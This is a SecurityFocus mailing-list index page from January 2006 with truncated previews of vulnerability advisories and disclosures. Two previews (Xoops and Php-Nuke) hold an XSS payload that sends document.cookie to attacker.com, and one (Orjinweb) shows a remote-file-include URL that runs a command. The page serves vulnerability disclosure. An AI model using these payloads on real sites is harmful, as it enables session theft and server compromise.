SecurityFocus

[SECURITY] [DSA 933-1] New hylafax packages fix arbitrary command execution 2006-01-10
Michael Stone (mstone klecker debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 933-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Michael Stone
January 9, 2006

[ more ] [ reply ]

Research: Malware Action Detection and Protection 2006-01-07
Arman Nayyeri (arman-n phreaker net)

Hi,

After 15 month of work it is MADP's showtime. The people who remember my
last
finding about windows media player vulns should remember IDT project and I
must say that they are both the same but with different names.

The following is a plain text copy of MADP v1.0 document.First read the
docum

[ more ] [ reply ]

MDKSA-2006:003 - Updated poppler packages fix several vulnerabilities 2006-01-09
Mandriva Security Team (xsecurity mandriva com)

MDKSA-2006:008 - Updated koffice packages fix several vulnerabilities 2006-01-06
Mandriva Security Team (security mandriva com)

MDKSA-2006:006 - Updated gpdf packages fix several vulnerabilities 2006-01-09
Mandriva Security Team (xsecurity mandriva com)

MDKSA-2006:005 - Updated xpdf packages fix several vulnerabilities 2006-01-09
Mandriva Security Team (xsecurity mandriva com)

MDKSA-2006:009 - Updated apache2-mod_auth_pgsql packages fix several vulnerabilities 2006-01-07
Mandriva Security Team (xsecurity mandriva com)

[eVuln] 427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS) 2006-01-07
alex evuln com

New eVuln Advisory:
427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)

--------------------Summary----------------

Software: 427BB
Sowtware's Web Site: http://sourceforge.net/projects/fourtwosevenbb
Versions: checked: 2.2 and 2.2.1
Critical Level: Dangerous
Ty

[ more ] [ reply ]

Xoops Pool Module IMG Tag Cross Site Scripting 2006-01-07
night_warrior771 hotmail com

##Night_Warrior<Kurdihs Hacker>
##night_warrior771[at]hotmail.com
##Xoops Pool Module IMG Tag Cross Site Scripting
##Contact :night_warrior771[at]hotmail.com
Post Coment this Code:
<img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+doc
ument.cookie);"

cookies.php
$cookie = $_G

[ more ] [ reply ]

Php-Nuke Pool and News Module IMG Tag Cross Site 2006-01-07
night_warrior771 hotmail com

##Night_Warrior<Kurdihs Hacker>
##night_warrior771[at]hotmail.com
##Php-Nuke Pool and News Module IMG Tag Cross Site Scripting
##Contact :night_warrior771[at]hotmail.com
Post Coment this Code:
<img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+doc
ument.cookie);"

cookies.php
$

[ more ] [ reply ]

Orjinweb E-commerce 2006-01-06
serxwebun linuxmail org

Orjinweb E-commerce

Remote File Include Vulnerability

http://www.targetsite.com/?page=http://evilcode.txt?&cmd=uname -a

[ more ] [ reply ]

AIM Multiple Cross Site Scripting Vulnerability 2006-01-08
simo morx org

Title: AIM Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 26 December 2005
Published: 7 January 2006
MorX Security Research Team
http://www.morx.org

Service: Web

Vendor: AIM.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin atta

[ more ] [ reply ]

Html_Injection in vBulletin 3.5.2 2006-01-08
the_bekir savsak com

Vulnerable Version: 3.5.2 (prior versions also may be affected) Bug: Html_Injection (Second order Cross_Site_Scripting) Exploitation: Remote with browser

Html_Injection : The software does not properly filter HTML tags in the title of events before being passed to user in 'calendar.php'&'reminder.

[ more ] [ reply ]

MDKSA-2006:004 - Updated pdftohtml packages fix several vulnerabilities 2006-01-09
Mandriva Security Team (xsecurity mandriva com)

MDKSA-2006:008 - Updated koffice packages fix several vulnerabilities 2006-01-09
Mandriva Security Team (xsecurity mandriva com)

AOL Multiple Cross Site Scripting Vulnerability 2006-01-08
simo morx org

Title: AOL Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 26 December 2005
Published: 7 January 2006
MorX Security Research Team
http://www.morx.org

Service: Web

Vendor: AOL.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin atta

[ more ] [ reply ]

iDefense Security Advisory 01.09.06: Multiple Vendor mod_auth_pgsql Format String Vulnerability 2006-01-09
labs-no-reply (at) idefense (dot) com [email concealed] (labs-no-reply idefense com)

Multiple Vendor mod_auth_pgsql Format String Vulnerability

iDefense Security Advisory 01.09.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=367
January 09, 2006

I. BACKGROUND

The mod_auth_pgsql apache module allows user authentication against
information stored in a Postgre

[ more ] [ reply ]

[SECURITY] [DSA 932-1] New kpdf packages fix arbitrary code execution 2006-01-09
joey infodrom org (Martin Schulze)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 932-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
January 9th, 2006

[ more ] [ reply ]

Digital Armaments Security Advisory 01.09.2006: Apache auth_ldap module Multiple Format Strings Vulnerability 2006-01-09
info digitalarmaments com

Digital Armaments advisory is 12.22.2005
http://www.digitalarmaments.com/2006090173928420.html

I. Background

auth_ldap is an LDAP authentication module for Apache, the world's most popular web server. auth_ldap has excellent performance, and supports Apache on both Unix and Windows NT. It also has

[ more ] [ reply ]

[eVuln] Venom Board SQL Injection Vulnerability 2006-01-09
alex evuln com

New eVuln Advisory:
Venom Board SQL Injection Vulnerability

--------------------Summary----------------

Software: Venom Board
Sowtware's Web Site: http://sourceforge.net/projects/venomboard/
Versions: 1.22
Critical Level: Moderate
Type: Cross-Site Scripting
Class: Remote
Status: Unpatched
Exploit:

[ more ] [ reply ]

[SECURITY] [DSA 931-1] New xpdf packages fix arbitrary code execution 2006-01-09
joey infodrom org (Martin Schulze)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 931-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
January 9th, 2006

[ more ] [ reply ]

[eVuln] Foxrum BBCode XSS Vulnerabilty 2006-01-09
alex evuln com

New eVuln Advisory:
Foxrum BBCode XSS Vulnerabilty

--------------------Summary----------------

Software: Foxrum
Sowtware's Web Site: http://www.foxrum.fr.st/
Versions: 4.0.4f
Critical Level: Harmless
Type: Cross-Site Scripting
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available

[ more ] [ reply ]

NetBSD Security Advisory 2006-002: settimeofday() time wrap 2006-01-09
NetBSD Security Officer (security-officer NetBSD org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NetBSD Security Advisory 2006-002
=================================

Topic: settimeofday() time wrap

Version: NetBSD-current: source prior to December 5, 2005
NetBSD 3.0: not affected
NetBSD 2.1: affected
NetBSD 2.0.3: affected
NetBSD

[ more ] [ reply ]

NetBSD Security Advisory 2006-001: Kernfs kernel memory disclosure 2006-01-09
NetBSD Security Officer (security-officer NetBSD org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NetBSD Security Advisory 2006-001
=================================

Topic: Kernfs kernel memory disclosure

Version: NetBSD-current: source prior to November 23, 2005
NetBSD 3.0: not affected
NetBSD 2.1: affected
NetBSD 2.0.3: affected

[ more ] [ reply ]

[SECURITY] [DSA 930-1] New smstools packages fix format string vulnerability 2006-01-09
Michael Stone (mstone klecker debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 930-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Steve Kemp
Jan 9, 2006

[ more ] [ reply ]

[SECURITY] [DSA 929-1] New petris packages fix buffer overflow 2006-01-09
Michael Stone (mstone klecker debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 929-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Steve Kemp
Jan 9, 2006

[ more ] [ reply ]

[UPDATE]Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities 2006-01-09
frankruder hotmail com

Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities

//this bug report is update for <<Microsoft Windows GRE WMF Format Multiple Memory Overrun Vulnerabilities>> by cocoruder 2006.01.07

by cocoruder
page:http://ruder.cdut.net
email:frankruder_at_hotmail.com

Last Up

[ more ] [ reply ]